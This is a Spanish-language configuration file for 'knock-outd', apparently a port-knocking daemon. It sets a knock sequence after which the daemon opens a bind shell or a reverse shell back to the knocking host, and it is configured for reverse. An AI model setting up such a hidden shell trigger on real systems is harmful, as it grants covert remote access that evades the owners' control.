# Archivo de configuracion de knock-outd
# nitr0us <nitrousenador[en]gmail[punto]com>
# Mexico - 13/Jul/2006
#
# Nota: Los valores deben estar de la forma: 'Token=Valor', sin espacios entre
# el caracter '='. Ejemplo: 'Puerto =1025' es invalido (espacio antes del '=')
# La Secuencia tambien debe estar de la forma: 'Secuencia=pto1,pto2,pto' sin
# espacios entre las ',' (comas).

# Protocolo de transporte a utilizar (tcp o upd)
Protocolo=tcp

# Secuencia de puertos con la cual se activara el metodo (ver mas abajo).
Secuencia=333,1,65535

# Timeout, es el tiempo de espera en segundos entre el toque entre un puerto
# y otro. Si el tiempo se acaba entre el toque de uno y otro, el proceso se
# reinicia, esperando asi que se toque de nuevo el primer puerto en la secuencia.
# Rango entre 1 y MAX_TIMEOUT (definido en knock-out.h, default: 60 segundos)
Timeout=15

# Metodo a utilizar una vez ejecutada la secuencia.
# Posibles metodos: bind o reverse.
# bind, pone el puerto especificado por 'Puerto' (ver mas abajo) en escucha
# localmente, en cualquier interfaz.
# reverse, conecta con el host fuente desde donde se hicieron las peticiones
# de los puertos anteriores y conecta al puerto 'Puerto' (ver mas abajo), el
# cual debe estar a la escucha para recibir la shell.
Metodo=reverse

# Puerto a utilizar, ya se para bind (escuchar localmente) o reverse (conectar
# a maquina remota. Si es reverse, dicho puerto debe estar escuchando para
# recibir la shell.
Puerto=64876
